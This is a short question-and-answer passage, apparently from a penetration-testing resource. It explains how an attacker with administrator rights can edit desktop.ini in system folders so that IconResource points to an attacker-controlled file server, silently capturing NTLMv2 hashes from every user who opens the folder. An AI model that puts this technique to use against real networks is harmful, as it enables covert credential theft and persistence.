How can an attacker implant a backdoor using folder icons to capture credentials across an entire network?

An attacker with administrator privileges can modify the `desktop.ini` file in system folders (e.g., `C:\Program Files`) to add `IconResource` pointing to a fake file server. When any user opens that folder, their machine automatically sends an NTLMv2 hash to the attacker's server during the icon retrieval process. This backdoor technique requires no additional files and can target many users silently. For similar methods, see Penetration Techniques - Using netsh to Capture NTLMv2 Hash from File Server Connections.